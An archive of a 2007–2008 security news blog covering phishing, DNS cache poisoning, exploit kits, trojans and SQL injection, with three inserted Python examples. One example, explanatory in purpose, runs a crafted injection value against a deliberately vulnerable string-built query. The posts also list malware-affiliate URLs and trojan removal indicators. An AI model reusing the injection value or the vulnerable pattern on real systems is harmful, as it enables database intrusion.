
Friday, November 07, 2008
It has come to our attention that, once again, phishing and malware injection have reached an alarming rate.
Sample:
Sorry, we were not able to deliver postal package you sent on October the 19th in time because the recipient address is not correct.
Please print out the invoice copy attached and collect the package at our office.
If you do not receive package in ten days you will have to pay 6$ per day.
Your UPS
It is clear to most of us that UPS would never send you an email with a zip file in it. But not everyone is experienced, and this is the problem. If you have not sent anything via UPS, delete messages like this; if you have, go to UPS tracking instead. Do not open zip files that have an .exe in them, and do not be silly enough to click them. The best rule: if it does not come from a valid source, just delete it.

Thursday, September 11, 2008
Obama sex video? Hardly. It's spyware spreading via e-mail
Don't believe everything you read on the Internet: Democratic presidential candidate Barack Obama isn't a terrorist...or a porn star.
A malicious spam e-mail is spreading that claims to have a link to a sex video of Obama but is instead spyware that steals sensitive data from the computer, security firm Sophos warned on Wednesday.
The subject line says "Obama sex video!!!" and the e-mail appears to come from "infonews@obama.com," Graham Cluley, senior technology consultant at Sophos, says on his blog.
Clicking on the link downloads an executable file that plays an amateur porn video, but Obama is not in it.
Meanwhile, behind the scenes a Trojan horse known as Mal/Hupig-D is installed. The Trojan targets Windows machines and steals passwords and bank account data, Cluley said.
Is it the work of the Republicans? Probably not; it has the trademark bad grammar and excessive punctuation of traditional phishing attempts, many of which originate outside English-speaking countries.

Tuesday, August 12, 2008
The Internet remains vulnerable to exploits of a critical security flaw in the Domain Name System, a Russian programmer demonstrated last week. Writing on his blog on Friday, Evgeniy Polyakov posted that he had succeeded in getting patched DNS software to return an incorrect location in less than 10 hours.
Researchers who spearheaded an international push to get internet service providers and other large organizations to patch the flaw said they weren't terribly concerned about the exploit code. That's because Polyakov's attack took 10 hours to carry out using two machines connected directly to the targeted DNS server via a gigabit ethernet link.
"That's a little different than spending 10 seconds over the internet" to carry out an attack, said Dan Kaminsky, the researcher who first warned of the DNS cache poisoning vulnerability.
The original attack works by flooding a DNS server with thousands of requests for domains with slightly different variations, 1.google.com, 2.google.com, 3.google.com and so forth. That allows attackers to gain a secret transaction number needed to trick other computers into updating their records with IP addresses that lead to rogue websites.
So a word to the big players of the world: you dodged a bullet in surviving the Kaminsky bug without issue, but next time you may not be as lucky.
Creating a real fix won't be easy, but it's essential.

Friday, August 08, 2008
Expectations were running high before Wednesday morning, as Kaminsky, director of penetration testing for IOActive, had revealed little about his DNS vulnerability up till then. That didn't stop others from trying to figure it out, but that actually helped Kaminsky in the end: it meant that during his speech he was able to skip the what and go directly to the why.
Security researchers always thought it was hard to poison DNS records, but Kaminsky said to think of the process as a race, with a good guy and a bad guy each trying to get a secret number, the transaction ID. "You can get there first," he said, "but you can't cross the finish line unless you have the secret number."
The question is, why would someone bother? Well, Kaminsky talked about how deeply embedded DNS is in our lives. Kaminsky said there are three ages in computer hacking. The first was attacking servers (for example FTP and Telnet). The second was attacking browsers (for example JavaScript and ActiveX). We're now about to enter the third age, where attacking Everything Else is possible.
We know that if we type name.com into a browser, the DNS resolves it to its numerical address. But what we don't realize is that the same process occurs when we send e-mail or when we log onto a Web site. These also require a DNS lookup.
Kaminsky then detailed how various security methods on the Web can be defeated if one owns the DNS. For example, if a site wants to establish a Trust Authority Certificate with the Certificate Authorities, they use e-mail to confirm the identity of the requester. He also said that it's possible to poison Google Analytics and even Google AdSense, which also rely on DNS lookup.
Prior to the patch, the bad guy had a 1 in 65,000 chance of getting it because the transaction ID is based, in part, on the port number used. With the patch, the chances decrease to 1 in 2,147,483,648. Kaminsky said it's not perfect, but it's a good enough start.
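To make the race and the two numbers above concrete, here is an added example (mine, not Kaminsky's or this post's) that models the resolver's acceptance check and the odds that a blindly forged reply passes it. It assumes a 16-bit transaction ID and about 15 bits of source-port randomness after the patch, which is exactly what turns 65,536 into 2,147,483,648 (2**31).

```python
"""Model of the resolver-side check behind DNS cache poisoning (added example).
A resolver only uses a reply that matches the outstanding question, its
transaction ID and, once source ports are randomised, its UDP port."""
import math
import random
from dataclasses import dataclass

TXID_BITS = 16   # width of the DNS transaction ID field
PORT_BITS = 15   # assumption: usable entropy of a randomised ephemeral source port
FIXED_PORT = 53  # pre-patch: many resolvers sent every query from one known port


@dataclass(frozen=True)
class OutstandingQuery:
    qname: str
    txid: int
    port: int


def send_query(rng: random.Random, qname: str, randomize_port: bool) -> OutstandingQuery:
    """Record what the resolver will later require a reply to match."""
    txid = rng.getrandbits(TXID_BITS)
    port = 32768 + rng.getrandbits(PORT_BITS) if randomize_port else FIXED_PORT
    return OutstandingQuery(qname, txid, port)


def accept_reply(q: OutstandingQuery, qname: str, txid: int, port: int) -> bool:
    """The defence: a reply counts only if question, transaction ID and port all match."""
    return qname == q.qname and txid == q.txid and port == q.port


def guess_space(randomize_port: bool) -> int:
    """Number of (txid, port) combinations a forged reply has to cover."""
    return 2 ** TXID_BITS * (2 ** PORT_BITS if randomize_port else 1)


def hit_probability(randomize_port: bool, forged_replies: int) -> float:
    """P(at least one of N uniformly guessed forged replies is accepted)."""
    s = guess_space(randomize_port)
    return 1.0 - (1.0 - 1.0 / s) ** forged_replies


def replies_for_confidence(randomize_port: bool, p: float) -> int:
    """Forged replies needed before the chance of a single accepted one reaches p."""
    s = guess_space(randomize_port)
    return math.ceil(math.log1p(-p) / math.log1p(-1.0 / s))


def simulate_race(seed: int, randomize_port: bool, forged_per_query: int, queries: int) -> int:
    """Monte Carlo view of the race: each query is met by N random guesses before
    the genuine reply lands. Returns how many queries ended up poisoned."""
    rng = random.Random(seed)
    poisoned = 0
    for i in range(queries):
        q = send_query(rng, f"{i}.example.test", randomize_port)  # constructed names
        for _ in range(forged_per_query):
            guess_txid = rng.getrandbits(TXID_BITS)
            guess_port = 32768 + rng.getrandbits(PORT_BITS) if randomize_port else FIXED_PORT
            if accept_reply(q, q.qname, guess_txid, guess_port):
                poisoned += 1
                break
    return poisoned


if __name__ == "__main__":
    for patched in (False, True):
        print(f"patched={patched}: space={guess_space(patched):,}, "
              f"P(hit | 1000 forged)={hit_probability(patched, 1000):.6f}, "
              f"forged replies for 50%={replies_for_confidence(patched, 0.5):,}")
```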

Thursday, August 07, 2008
The DNS vulnerability in the Internet's design is allowing criminals to silently redirect traffic to Web sites under their control. The problem is being fixed, but its extent remains unknown and many people are still at risk.
The bug's existence was revealed nearly a month ago. Since then, criminals have pulled off at least one successful attack, directing some AT&T Inc. Internet customers in Texas to a fake Google site. The phony page was accompanied by three programs that automatically clicked on ads, with the profits for those clicks flowing back to the hackers.
There are likely worse scams happening that haven't been discovered or publicly disclosed by Internet service providers. "You can bet that the (Internet providers) are going to stay tightlipped about any attacks on their networks," said HD Moore, a security researcher.
The AT&T attack probably would have stayed quiet had it not affected the Internet service of Austin, Texas-based BreakingPoint Systems Inc., which makes machines for testing networking equipment and has Moore as its labs director. He disclosed the incident in hopes it would help uncover more breaches.
The underlying flaw is in the Domain Name System (DNS), a network of millions of servers that translate words typed into Web browsers into numerical codes that computers can understand.
What this means is that a computer user in say, San Francisco, might type http://www.yahoo.com and head straight to the real Yahoo site, while at the same moment, a user in New York — whose traffic is routed through different DNS servers — might type that same Web address and end up on a phony duplicate site.

Saturday, June 21, 2008
I will not start this article by beating on the Washingtonpost.com. One should seriously question the headline of the article! I guess if it hits the United Nations it is news! The world has problems; #1 is certainly determining blame, followed by a posse mentality.
Giorgio Maone at hackademix was the one consistent calm in the storm of comments. When you look for answers to the Universe, this is always good reading material. It is only a joke, people, so let's not get too serious. This article does point out the problem and suggests some solutions.
I do seriously wonder why the WashingtonPost.com article included the wrong assertion by PandaLabs that the problem is actually Microsoft's, with IIS being the cause. Perhaps just a case of fair and balanced reporting? But then going on for several more paragraphs, with irrelevant links over an advisory which is not even the point, is beyond me!
The article's comments did bring the usual Linux desktop dorks out of the woodwork. It always amazes me how Mac and Linux people have this idea that they are ten feet tall and bulletproof. I do have several Linux machines, but really, this attack has nothing to do with the OS or the web server. A SQL injection is all about poorly formed code. I see you there looking for the person to blame! Stop it!
"Developers at fault? SQL Injection attacks lead to wide-spread compromise of IIS servers" is the headline at ZDNet! It is a great article and should be read by anyone who has any questions about this type of attack, as should this article. But really, let's not go through life with this posse mentality. Let's try to focus more on the thugs who cause this type of thing. I don't mean getting bottom-feeding lawmakers involved. Sharing information and taking action is the only real cure.
A tip to developers: don't write code and walk away. If you have a contract like this, it must come with warnings to the client. If you maintain a site, it is your duty to remain vigilant and update code. If you are not charging for this, you should revise your contracts to assure you have covered all the bases. If you are charging, then do your job!

Monday, June 09, 2008
Microsoft is a company that usually keeps plenty busy advising users of security issues with its products. Redmond is now advising users about a blended security threat that involves users running Apple's Safari Web browser on Windows.
The threat could potentially allow Safari to download a malicious file that Windows would then execute. Microsoft has a work-around it suggests, though no patch is available from Apple (NASDAQ: AAPL) for the issue.
"Security Advisory (953818) does not refer to a vulnerability in either Safari or Windows," Tim Rains, security response communications lead for Microsoft, said in a statement sent to InternetNews.com.
The Safari issue had been publicly disclosed by security researcher Nitesh Dhanjani on May 15. Dhanjani described the issue as a 'Safari Carpet Bomb' in his discussion of the security risk.

Saturday, May 17, 2008
Mozilla warned Wednesday that a malicious program inserted adware code into a Firefox plugin that has been downloaded thousands of times over the past three months.
Because of a virus infection, the Vietnamese language pack for Firefox 2 was polluted with adware, Mozilla security chief Window Snyder said in a blog posting. "Everyone who downloaded the most recent Vietnamese language pack since February 18, 2008 got an infected copy," she wrote. "Mozilla does virus scans at upload time but the virus scanner did not catch this issue until several months after the upload."
Mozilla is now going to add additional scans of its software to prevent this kind of thing from happening in the future.
The malware in the language pack is from the Xorer Trojan, according to discussion on Mozilla's Bugzilla developer Web site, which indicates that Mozilla developers first discovered the issue on Tuesday.
Mozilla missed the code during its initial scan because antivirus vendors had not yet added detection for Xorer into their products. Antivirus vendor Panda Security first detected Xorer on Feb. 28, 10 days after the infected plugin was published. Firefox developers have now scanned all of their plugins.
The open-source browser maker does not know how many people were infected with the adware, but the plugin was downloaded more than 1,200 times in the past week and has been downloaded 16,667 times since November.

Sunday, May 11, 2008
Security researchers have developed a new type of malicious rootkit software that hides itself in an obscure part of a computer's microprocessor, hidden from current antivirus products.
Called a System Management Mode (SMM) rootkit, the software runs in a protected part of a computer's memory that can be locked and rendered invisible to the operating system, but which can give attackers a picture of what's happening in a computer's memory.
The proof-of-concept software will be demonstrated publicly for the first time at the Black Hat security conference in Las Vegas this August. The rootkits used by cyber crooks today are sneaky programs designed to cover up their tracks while they run in order to avoid detection. Rootkits hit the mainstream in late 2005 when Sony BMG Music used rootkit techniques to hide its copy protection software. The music company was ultimately forced to recall millions of CDs amid the ensuing scandal.
In recent years, however, researchers have been looking at ways to run rootkits outside of the operating system, where they are much harder to detect. For example, two years ago researcher Joanna Rutkowska introduced a rootkit called Blue Pill, which used AMD's chip-level virtualization technology to hide itself. She said the technology could eventually be used to create "100 percent undetectable malware." Full Article

Saturday, March 29, 2008
A blossoming Web attack, first reported by security researcher Dancho Danchev earlier this month, has expanded to hit more than a million Web pages, including many well-known sites.
"The number and importance of the sites has increased," wrote Danchev in a blog post where he reported that trusted Web sites such as USAToday.com, Target.com, and Walmart.com have been hit with the attack.
The criminals behind this have not actually hacked into servers, but they are taking advantage of Web programming errors to inject malicious code into search results pages created by the Web sites' internal search engines.
"Malicious parties are actively poisoning these sites' search query caching feature to position the keywords among the top ten search results, thereby infecting anyone coming across them," said Danchev in an instant-message interview.
He believes that more than 1 million Web pages have been infected using this technique.
"The more keywords they submit with [malicious] script, the more pages with popular keywords the high page ranked sites would cache," he said. This increases the chance that someone will see the search results hosted on the reputable site and click on the malicious page.
The Web sites that have been hit with this attack could fix the problem by doing a better job of checking the search queries on their internal search engines to make sure that there is no malicious code in them, Danchev said.
Hackers are increasingly looking for ways to install their code on trusted Web sites. In recent weeks, security vendors have found hundreds of thousands of Web pages affected by this and other similar attacks.

Monday, March 17, 2008
Websense Security Labs has discovered that Google's popular web mail service Gmail is being targeted by recent spammer tactics. Spammers in these attacks managed to create bots that are capable of signing up and creating random Gmail accounts for spamming purposes.
Websense believes that from the spammers’ perspective, there are four main advantages to this approach. First, signing up for an account with Google allows access to its wide portfolio of services. Second, Google’s domains are unlikely to be blacklisted. Third, they are free to sign up. And fourth, it may be hard to keep track of them as millions of users worldwide are using various Google services on a regular basis. Learn More

Monday, January 21, 2008
Criminals have been able to hack into computer systems via the Internet and cut power to several cities, a U.S. CIA analyst said. Speaking at a conference of security professionals on Wednesday, Jan. 16, 2008, CIA analyst Tom Donahue disclosed the recently declassified attacks while offering few specifics on what actually went wrong.
Criminals have launched online attacks that disrupted power equipment in several regions outside of the U.S., he said, without identifying the countries affected. The goal of the attacks was extortion, he said.
"We have information, from multiple regions outside the United States, of cyber intrusions into utilities, followed by extortion demands," he said in a statement posted to the Web on Friday by the conference's organizers, the SANS Institute. "In at least one case, the disruption caused a power outage affecting multiple cities. We do not know who executed these attacks or why, but all involved intrusions through the Internet."
One conference attendee said the disclosure came as news to many of the government and industry security professionals in attendance. "It appeared that there were a lot of people who didn't know this already," said the attendee, who asked not to be identified because he is not authorized to speak with the press.
He confirmed SANS' report of the talk. "There were apparently a couple of incidents where extortionists cut off power to several cities using some sort of attack on the power grid, and it does not appear to be a physical attack," he said.
Hacking the power grid made front-page headlines in September when CNN aired a video showing an Idaho National Laboratory demonstration of a software attack on the computer system used to control a power generator. In the demonstration, the smoking generator was rendered inoperable. The U.S. is taking steps to lock down the computers that manage its power systems, however.
On Thursday, the Federal Energy Regulatory Commission (FERC) approved new mandatory standards designed to improve cybersecurity.

Tuesday, December 04, 2007
Microsoft said Monday that a flaw in the way its Windows operating system looks up other computers on the Internet has resurfaced and could expose some customers to online attacks. Security Advisory
The flaw primarily affects corporate users outside of the U.S. It could theoretically be exploited by attackers to silently redirect a victim to a malicious Web site.
Microsoft originally patched this flaw in 1999, but it was rediscovered recently in later versions of Windows and was then publicized at a recent hacker conference in New Zealand. "This is a variation of that previously reported vulnerability that manifests when certain client side settings are made," said Mike Reavey, a group manager at Microsoft's Security Response Center.
The bug has to do with the way Windows systems look for DNS (Domain Name System) information under certain configurations.
Any version of Windows could theoretically be affected by the flaw, but Microsoft issued an advisory Monday explaining which Windows configurations are at risk and offering some possible workarounds for customers. The company said it is working to release a security patch for the problem.
• Customers who do not have a primary DNS suffix configured on their system are not affected by this vulnerability. In most cases, home users that are not members of a domain have no primary DNS suffix configured. Connection-specific DNS suffixes may be provided by some Internet Service Providers (ISPs), and these configurations are not affected by this vulnerability.
• Customers whose DNS domain name is registered as a second-level domain (SLD) below a top-level domain (TLD) are not affected by this vulnerability. Customers whose DNS suffixes reflect this registration would not be affected by this vulnerability. An example of a customer who is not affected is contoso.com or fabrikam.gov, where “contoso” and “fabrikam” are customer registered SLDs under their respective “.com” and “.gov” TLDs.
• Customers who have specified a proxy server via DHCP server settings or DNS are not affected by this vulnerability.
• Customers who have a trusted WPAD server in their organization are not affected by this vulnerability. (See the Workaround section for specific steps in creating a WPAD.DAT file on a WPAD server.)
• Customers who have manually specified a proxy server in Internet Explorer are not at risk from this vulnerability when using Internet Explorer.
• Customers who have disabled 'Automatically Detect Settings' in Internet Explorer are not at risk from this vulnerability when using Internet Explorer.
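The bullets above are a checklist; here is an added example (mine, not Microsoft's or the advisory's) that turns them into a small audit of a client's settings. It assumes a model of Windows DNS devolution in which the client appends the primary DNS suffix, then strips one leading label at a time and stops when two labels remain; that model reproduces the SLD exemption (contoso.com) but the rule itself is this example's assumption, and the org_domain field is an input the administrator supplies.

```python
"""Audit of the advisory's 'who is affected' bullets for a Windows client
(added example). The devolution rule below is an assumption, not advisory text."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ClientProxyConfig:
    primary_dns_suffix: str             # "" when the machine is not domain-joined
    org_domain: str                     # the DNS domain the organisation registered
    ie_auto_detect: bool = True         # IE "Automatically Detect Settings"
    manual_proxy: Optional[str] = None  # proxy typed into IE by hand
    proxy_from_dhcp_or_dns: bool = False
    trusted_wpad_host: bool = False     # org runs its own WPAD server with a WPAD.DAT


def devolution_candidates(primary_suffix: str, host: str = "wpad", stop_at: int = 2) -> List[str]:
    """Assumed devolution: try host.<suffix>, drop the leftmost label, repeat
    until only `stop_at` labels remain. Connection-specific suffixes are not
    devolved, so only the primary suffix is considered here."""
    labels = [lbl for lbl in primary_suffix.strip(".").split(".") if lbl]
    names: List[str] = []
    while len(labels) >= stop_at:
        names.append(f"{host}.{'.'.join(labels)}")
        labels = labels[1:]
    return names


def is_within(name: str, domain: str) -> bool:
    d = domain.strip(".").lower()
    n = name.lower()
    return n == d or n.endswith("." + d)


def exposed_lookups(cfg: ClientProxyConfig) -> List[str]:
    """WPAD names the client would query that fall outside the organisation's
    own domain, i.e. names that someone else could register."""
    return [n for n in devolution_candidates(cfg.primary_dns_suffix)
            if not is_within(n, cfg.org_domain)]


def assess(cfg: ClientProxyConfig) -> str:
    """Each branch mirrors one 'not affected' bullet from the advisory."""
    if not cfg.primary_dns_suffix:
        return "not affected: no primary DNS suffix configured"
    if cfg.proxy_from_dhcp_or_dns:
        return "not affected: proxy supplied via DHCP or DNS"
    if cfg.trusted_wpad_host:
        return "not affected: trusted WPAD server inside the organisation answers first"
    if cfg.manual_proxy or not cfg.ie_auto_detect:
        return "not affected in IE: manual proxy set or auto-detect disabled"
    exposed = exposed_lookups(cfg)
    if not exposed:
        return f"not affected: every WPAD candidate stays inside {cfg.org_domain}"
    return "AT RISK: client may trust a WPAD answer from " + ", ".join(exposed)


if __name__ == "__main__":
    # constructed configurations: an SLD-registered org and a third-level suffix
    for cfg in (ClientProxyConfig("contoso.com", "contoso.com"),
                ClientProxyConfig("corp.contoso.co.nz", "contoso.co.nz")):
        print(cfg.primary_dns_suffix, "->", devolution_candidates(cfg.primary_dns_suffix))
        print("  ", assess(cfg))
```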

Monday, October 15, 2007
Microsoft released six updates on Tuesday for at least nine security flaws, fixing critical issues in Word, Internet Explorer and the e-mail programs that the company ships with its Windows operating systems.
The most widespread vulnerability appears to be in the way Internet Explorer handles a script error, allowing an attacker to access freed memory. The flaw has been rated Critical for both IE 6 and IE 7 running on Windows XP and Vista. Because Internet Explorer runs in an enhanced security configuration on Windows Server 2003, that platform is not impacted as severely. The three other vulnerabilities fixed by the Cumulative Security Update for Internet Explorer had a maximum severity of Moderate.
Another vulnerability in the way Microsoft's e-mail programs handled news groups via NNTP (Network News Transfer Protocol) was rated Critical for Outlook Express and Important for Windows Vista's Mail application. The software giant rated a vulnerability in Microsoft Word only Critical for Office 2000 and Important for later versions of the productivity suite. A security hole in the Kodak Image Viewer also received a Critical rating by Microsoft.
Windows users should patch their systems as soon as possible. Online attacks have increasingly used flaws in Internet Explorer to redirect unwary visitors, using IFrames, from legitimate sites to malicious sites that compromise the victims' computers. The MPack infection tool kit is one of the programs commonly used to automate the process. Espionage attacks emanating from servers in China, among other nations, have regularly used Office flaws to infect the victim's computer.

Tuesday, September 25, 2007
A vulnerability in Ask.com's toolbar for Internet Explorer could allow an attacker to take control of a person's computer, according to security advisories.
The problem concerns a buffer overflow flaw in the toolbar and involves an ActiveX control, according to an advisory posted by security vendor Secunia APS, which rated the problem as "highly critical," its second most severe rating. It affects version 4.0.2 of the toolbar and possibly others.
Proof-of-concept exploit code for the vulnerability has been publicly posted on other disclosure forums, with a person named "Joey Mengele" credited with finding the flaw. Ask.com officials contacted in London were not immediately available to comment.
The Ask.com toolbar sits below the address bar and can perform a variety of category-specific searches, such as weather information, stock quotes or search a person's desktop, as well as Web searching.
As of Tuesday afternoon local time, WabiSabi Labi Ltd., a Swiss company that specializes in selling vulnerability information, was still auctioning the Ask.com toolbar problem for a minimum of $705, although no bids were listed.
WabiSabi Labi's auctioning of security vulnerabilities has caused a stir among security analysts who believe software companies should be discreetly notified of vulnerabilities and allowed to patch the software so as to not put users in danger. The company maintains security researchers should be rewarded for their work.

Thursday, August 23, 2007
The MPack toolkit has received a fair amount of media attention, causing it to become one of the most desired Web browser exploit toolkits in the underground hacker scene. The original author was selling the MPack toolkit for $1000 USD, including a year of free support, and additional exploit modules for around $100 USD. Personally, I like the quote from the author when asked, "Do you feel sorry for the people whose machines are infected by an attack?": "Well, I feel that we are just a factory producing ammunition." Now there is some logic for you!
However, considering the toolkit is written in a script language, it is easy to redistribute and modify. The toolkit is being sold by others now for as low as $150 USD. That is a whopping 85% off. Talk about a clearance sale. The sellers likely didn't even need to buy it themselves, but rather probably found some of the multiple Web sites that did not employ standard Web site protections, allowing them to download the whole kit for free.
How it works is clearly outlined, and Trend Micro does at least offer a method of discovery. What is odd, with all the press about this organized criminal approach to fraud and theft, is that governments, security firms, and antivirus companies of the world are doing very little. Now that the cat is out of the bag, the variants will be haunting the world, making the internet totally infested with poor, ignorant users, as the list of variants grows, each with its own twist on the base. What is at the core, besides ignorance, is the social engineering part of this type of threat.
More details and articles on the topic: EWeek, Microsoft, BBC, Wikipedia
There are many marketing companies that promote web traffic to different Web pages, software installations, etc. They use what they call 'affiliate programs', paying money for every software installed or traffic generated. This web traffic is very assorted: activex, rogue-antispywares, bundles, banners, fakecodecs, iframes, etc.
Although some of these marketing enterprises can be well-intentioned, others have been specifically created by and for cybercriminals to earn money. Here we can see a GIF file that was being used by one of these companies in order to advertise itself in an underground malware forum:

A short time ago, while analyzing a Trj/Sinowal variant (a banking Trojan) to discover where it was sending the information, one of these websites was found. It was discovered that this site had 4 different kits to install malware through exploits on the same server the page was hosted on:
There was an IcePack, a Traffic Pro, a Prime Exploit System, and a very basic kit that only used two exploits and had no name. These kits were downloading two Trojans: Trj/Galapoper and Trj/Sinowal. This is not the first time we have seen something similar. The web sites where they promote themselves tend to be very eye-catching; here you can see some examples:
http://fantasticdollars.com/
http://iframe911.com/
http://www.iframebiz.com/
http://loads.cc/
What seems to be the solid theme throughout this whole deal is that most of the Trojan variants are based on a kit called MPack.

Monday, August 20, 2007
As Secure Computing first reported back in June, attackers are using a fake video link on the site to initiate infection with the Trojan, which bombards victims with porn adware before installing data-stealing code.
To make matters worse, the only defence against such attacks on the popular video-hosting website is the diligence of YouTube's security personnel, who can remove attacks as soon as they find them. However, according to Secure Computing's Paul Henry, this gives the malware distributors a window of opportunity of at least a few hours.
It is a backdoor designed to give the attacker remote control over a compromised computer. It changes essential system settings and modifies certain files. Zlob starts automatically on every Windows startup and stays hidden in the background. It waits for remote connections and allows the attacker to download and install additional software, execute certain commands and manage the entire system. Zlob can be very dangerous. Use antivirus and spyware removal tools in order to get rid of this parasite. Some Zlob versions pretend to be video codecs to attract people.
Kill processes:
msmsgs.exe
pmsngr.exe
kdqrn.exe
02.exe
kdvhv.exe
kdoaf.exe
kdkwb.exe
kdkat.exe
kdlfk.exe
kdefp.exe
Delete registry values:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\RegSvr32=%System%\msmsgs.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell=explorer.exe,msmsgs.exe
HKCU\Software\Internet Security\
HKCU\Software\HQvideo
Delete files:
msmsgs.exe
isaddon.dll
isamini.exe
pmsngr.exe
Programs\Media-Codec\ecodec.exe
kdqrn.exe
Temp\02.exe
kdvhv.exe
Temp\nsq3.tmp\modern-header.bmp
Temp\nsq3.tmp\nsExec.dll
kdoaf.exe
kdkwb.exe
System\kdkat.exe
System\kdlfk.exe
System\kdefp.exe

Saturday, August 11, 2007
The partner event registration page of the Microsoft UK events website has been defaced by a hacker who managed to discover and exploit a web application vulnerability in one of the parameters used by the form on the website, which could previously be accessed at:
http://www.microsoft.co.uk/events/net/eventdetail.aspx?eventid=8399 [taken offline]
The hacker, known by the name "rEmOtEr", managed to deface Microsoft’s page by taking advantage of an SQL Injection vulnerability in one of the parameters used by the form that was embedded in the URL of the page. This particular parameter was not being filtered, thus it allowed the hacker to pass any type of crafted code directly to the database being used by this form.
Full Article
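The entry above says the form's eventid parameter went to the database unfiltered. Here is an added example (mine, not Microsoft's code) that shows that pattern beside the fix, on a constructed in-memory SQLite table standing in for the real events database; the table, rows and column names are assumptions.

```python
"""Unfiltered query parameter vs. validated, parameterised query (added example).
The events table and its rows are constructed stand-ins, not the real site's data."""
import sqlite3
from typing import List, Tuple


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (eventid INTEGER PRIMARY KEY, title TEXT, is_public INTEGER)")
    conn.executemany("INSERT INTO events VALUES (?, ?, ?)", [
        (8399, "Partner event registration", 1),   # the id from the page's URL
        (8400, "Internal staff briefing", 0),      # constructed: never meant to be listed
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, eventid: str) -> List[Tuple[int, str]]:
    """The unfiltered pattern: the query-string value is spliced into the SQL text,
    so whatever the request carries is parsed by the database as part of the statement."""
    sql = f"SELECT eventid, title FROM events WHERE is_public = 1 AND eventid = {eventid}"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, eventid: str) -> List[Tuple[int, str]]:
    """The fix has two layers: check the value is the integer the form expects,
    then bind it as a parameter so the database never treats it as SQL."""
    if not eventid.isdigit():
        raise ValueError("eventid must be a positive integer")
    sql = "SELECT eventid, title FROM events WHERE is_public = 1 AND eventid = ?"
    return conn.execute(sql, (int(eventid),)).fetchall()


def run_demo() -> dict:
    """Run both lookups on a normal id and on a crafted value; returns the outcomes."""
    conn = setup_db()
    normal = "8399"
    crafted = "8400 OR 1=1"   # constructed: AND binds tighter than OR, so the filter collapses
    result = {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_crafted": lookup_vulnerable(conn, crafted),     # leaks the non-public row
        "hardened_normal": lookup_hardened(conn, normal),
    }
    try:
        lookup_hardened(conn, crafted)
        result["hardened_rejected"] = False
    except ValueError:
        result["hardened_rejected"] = True                     # rejected before reaching SQL
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```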

Tuesday, August 07, 2007
US federal agents are reaching out to computer hackers for help fighting crime and terrorism as a tug-of-war between privacy and public safety continues on the Web.
The National Security Agency (NSA), the Department of Defense and the FBI were among the spy, military and police agencies represented at DefCon, an international gathering of hackers in Las Vegas.
Lawyers from the foundation are spearheading litigation accusing the NSA of illegally snooping on e-mail and telephone communications. NSA vulnerability analysis chief Tony Sager gave a talk at DefCon, saying the agency was increasingly sharing information with the public in the hope computer wizards wherever they may be become allies in cyber security.
Hacker Roger Dingledine is working on an "anonymity network" called Tor that bounces Internet traffic off "about a thousand" computer servers to thwart tracking who is doing what online.
"The NSA spent decades trying to do things themselves and that didn't work. I'm happy they realise other people can help," he said.
Apple has issued three batches of software updates and fixes for its popular iPhone, Mac OS X operating system and the Safari 3.03 browser beta.
The iPhone fixes address a pair of Safari-related vulnerabilities that came up almost immediately after the phone's release, plus three more that were not disclosed.
A security firm called Independent Security Experts (ISE) first uncovered iPhone vulnerabilities last month and informed Apple of its findings. ISE planned to demonstrate what it found at the Black Hat security conference this week in Las Vegas.
Two of the fixes address cross-site scripting problems, one by preventing JavaScript in remote Web pages from modifying pages outside of their domain, the other by fixing an HTTP injection issue in XMLHttpRequest. Apple credited Richard Moore of Westpoint Ltd. for reporting the issue.
Apple credited the ISE crew for pointing out a heap buffer overflow problem in the Perl Compatible Regular Expressions (PCRE) library, while Apple thanked Tomohito Yoshino, of Business Architects, for reporting an error in International Domain Name (IDN) handling that allows fake URL addresses using fonts that contain look-alike characters.
Once again security researcher Joanna Rutkowska took the stage at Black Hat, and once again she set out to prove in glorious detail how to exploit and attack Microsoft Windows Vista.
This year she brought a new pill and a few more tricks to take Vista to task. "I'm going to talk about Vista kernel protection and why it doesn't work," Rutkowska boldly declared to the overflow crowd.
She then read a quote from Microsoft's Vista documentation that stated that even users with admin privileges cannot load unsigned kernel-mode code on the system. Then she smiled mischievously.
"There are thousands, maybe tens of thousands of third-party drivers that are poorly written and could be a problem," Rutkowska said.
She then displayed two examples, both from video driver companies, to prove her point. In her view both the ATI Catalyst driver and the NVIDIA nTune driver are bad in that they could be used as an attack vector to circumvent Vista kernel protection.
With the NVIDIA driver, Rutkowska alleged that the driver was able to read and write registers without any additional checks.
"The whole problem in NVIDIA is that the driver doesn't do the proper checks and can do a write for an arbitrary registry."
To add further insult to injury, the target machine doesn't even need to have the bad driver on the system in order for the attacker to use it as an attack vector.
"The attacker could just include it as part of their own rootkit and then use it to exploit Vista," Rutkowska said. "It doesn't matter whether it's a popular driver or not. We can bring it to the target system and exploit it." Full Article

Thursday, August 02, 2007
As reported by John Schwartz in today's New York Times (registration required), security firm Independent Security Evaluators has demonstrated an attack that lets a hostile Web page take full control of an iPhone and capture a user's personal data. Although there is no indication that the vulnerability is being exploited in the wild, computer scientist Steven M. Bellovin of Columbia University is quoted as saying "it looks like a very genuine hack." (You can watch a video demonstration of the attack here.)
Bellovin points out that this sort of attack is inevitable as operating systems on phones get more and more computer-like. The iPhone runs a version of Mac's OS X operating system, though Apple has been extremely stingy with details on just which pieces of OS X are included. It's not clear whether the iPhone attack, which exploits a vulnerability in the Safari browser, might also work against Macs.
To date, attacks against phones have been relatively rare and not very damaging. The Symbian operating system, which is little used in the U.S. but is popular on European and Asian handsets from Nokia and Sony Ericsson, has probably been hit the hardest. I have not heard of any successful attacks on Research in Motion's BlackBerrys. And hackers have only struck a couple of glancing blows on Microsoft's Windows Mobile software, though the threat is taken seriously enough that you can now get protective software for your smartphone from Symantec and others.
Apple likely will move to plug the hole with a patch that can be downloaded to iPhones. But this incident is a clear sign that the cat and mouse game between security experts and hackers that has long been a part of life in the world of personal computers is going to become commonplace in phones too.

Wednesday, August 01, 2007
Finjan, a developer of Web security products, has found what has to be the nastiest of malware yet because it inserts itself into a legitimate online banking transaction that's supposed to be protected by SSL encryption.
